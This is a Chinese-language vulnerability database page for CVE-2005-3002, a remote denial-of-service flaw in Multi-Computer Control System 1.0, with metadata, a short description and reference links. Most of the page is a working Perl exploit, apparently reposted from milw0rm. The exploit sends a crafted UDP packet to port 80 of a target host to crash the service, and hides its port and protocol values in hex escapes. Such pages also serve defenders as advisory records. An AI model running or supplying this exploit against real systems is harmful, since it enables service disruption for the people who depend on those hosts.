Multi-Computer Control System (MCCS) 拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109085 漏洞类型 未知
发布时间 2005-09-19 更新时间 2005-09-20
CVE编号 CVE-2005-3002 CNNVD-ID CNNVD-200509-179
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1222
https://www.securityfocus.com/bid/89289
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-179
|漏洞详情
MCCS是多计算机控制系统软件。Multi-ComputerControlSystem(MCCS)1.0版本中,远程攻击者可以通过恶意UDP数据包触发服务拒绝。
|漏洞EXP
#!usr/bin/perl
#
# MCCS Server\Client Command DOS Exploit
# --------------------------------------
#  Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: www.xclusive-software.com
#


use IO::Socket;

print("\n  MCCS Command DOS Exploit\n");
print("-----------------------------\n");

$str = "\x41";
if($#ARGV < 0 | $#ARGV > 1) {
die "usage: perl $0 [IP/host] \nExam: perl $0 127.0.0.1 \n" };

$adr = $ARGV[0];
$prt = "\x38\x30";

print "[+] Connect to host..\n";
sleep 2;
$remote = IO::Socket::INET->new(Proto=>"\x75\x64\x70", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "[-] Error: can't connect to $adr:$prt\n";
print "[+] Connected\n";
$remote->autoflush(1);
print "[+] Sending bad string..\n";
sleep 2;
print $remote "$str" or die "[-] Error: can't send string code\n";
print "[*] Client Server SHUTDOWNED!\n\n";
print "press any key to exit..\n";
$bla= <STDIN>;
close $remote;

# milw0rm.com [2005-09-19]
|受影响的产品
Xclusive-Software Mccs 1.0
|参考资料

来源:SECUNIA
名称:16865
链接:http://secunia.com/advisories/16865
来源:MISC
链接:http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=93
来源:MISC
链接:http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=93